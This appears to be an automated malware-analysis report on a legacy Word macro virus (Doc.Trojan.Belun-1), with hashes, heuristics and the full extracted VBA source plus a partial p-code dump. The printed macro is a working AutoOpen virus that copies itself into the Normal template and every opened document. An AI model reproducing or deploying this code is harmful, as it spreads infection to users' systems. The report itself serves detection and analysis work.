Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 59d8811dd2495bda…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-05-24 14:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8d3942375321709c4eadbb9a6898da19 SHA-1: 4b5589005b6c4338f3ba9e33df1b5e04207e7b36 SHA-256: 59d8811dd2495bdad572d59edd80247a7224c8856a61e5eef008a24680145608
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen subroutine, named 'IstMirSchlecht', attempts to copy itself to the Normal template and the active document, likely to establish persistence or evade detection. The ClamAV detection 'Doc.Trojan.Belun-1' further supports its malicious nature. The macro's logic suggests an attempt to maintain its presence across sessions.

Heuristics 4

  • ClamAV: Doc.Trojan.Belun-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Belun-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9176 bytes
SHA-256: f92c9e11fe67ed3ae17fe4df01a44d537d39c1dbefb682346022f03062ba84e4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "uebel"
Sub AutoOpen()
    IstMirSchlecht
End Sub
Sub IstMirSchlecht()
'On Error Resume Next
Set Norm = NormalTemplate.VBProject.VBComponents
Set Acti = ActiveDocument.VBProject.VBComponents
Const ActiveModulName = "uebel"

For i = 1 To Norm.Count
    If Norm(i).Name = ActiveModulName Then NormIns = True
    If Norm(i).Name = "Modul1" And NormIns = False Then KillSomeNormModul = True
Next

For i = 1 To Acti.Count
    If Acti(i).Name = ActiveModulName Then ActIns = True
    If Acti(i).Name = "Modul1" And ActIns = False Then KillSomeActModul = True
Next

If KillSomeNormModul = True Then
    Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If

If KillSomeActModul = True Then
    Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If

If NormIns = False Then
    CheckRefNormal
    Norm.Add (vbext_ct_StdModule)
    Norm("Modul1").Name = ActiveModulName
    ActiveLines = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
    ActContent = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, ActiveLines)
    Norm(ActiveModulName).CodeModule.AddFromString (ActContent)
    NormalTemplate.Save
End If
    
If ActIns = False Then
    CheckRefActive
    Acti.Add (vbext_ct_StdModule)
    Acti("Modul1").Name = ActiveModulName
    NormLines = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
    NormContent = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, NormLines)
    Acti(ActiveModulName).CodeModule.AddFromString (NormContent)
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If

End Sub

Function CheckRefNormal()
CheckRefNormal = False

For i = 1 To NormalTemplate.VBProject.References.Count
    If NormalTemplate.VBProject.References(i).Name = "VBIDE" Then CheckRefNormal = True
Next

If CheckRefNormal = False Then
    NormalTemplate.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

Function CheckRefActive()
CheckRefActive = False

For i = 1 To ActiveDocument.VBProject.References.Count
    If ActiveDocument.VBProject.References(i).Name = "VBIDE" Then CheckRefActive = True
Next

If CheckRefActive = False Then
    ActiveDocument.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

' Processing file: /opt/analyzer/scan_staging/6347f529b1754315b9a9fde4025c806e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1586 bytes
' Macros/VBA/uebel - 6220 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	ArgsCall IstMirSchlecht 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Sub IstMirSchlecht())
' Line #4:
' 	QuoteRem 0x0000 0x0014 "On Error Resume Next"
' Line #5:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set Norm 
' Line #6:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set Acti 
' Line #7:
' 	Dim (Const) 
' 	LitStr 0x0005 "uebel"
' 	VarDefn ActiveModulName
' Line #8:
' Line #9:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Norm 
' 	MemLd Count 
' 	For 
' Line #10:
' 	Ld i 
' 	ArgsLd Norm 0x0001 
' 	MemLd New 
' 	Ld ActiveModulName 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NormIns 
' 	EndIf 
' Line #11:
' 	Ld i 
' 	ArgsLd Norm 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Modul1"
' 	Eq 
' 	Ld NormIns 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St KillSomeNormModul 
' 	EndIf 
' Line #12:
' 	StartForVariable
... (truncated)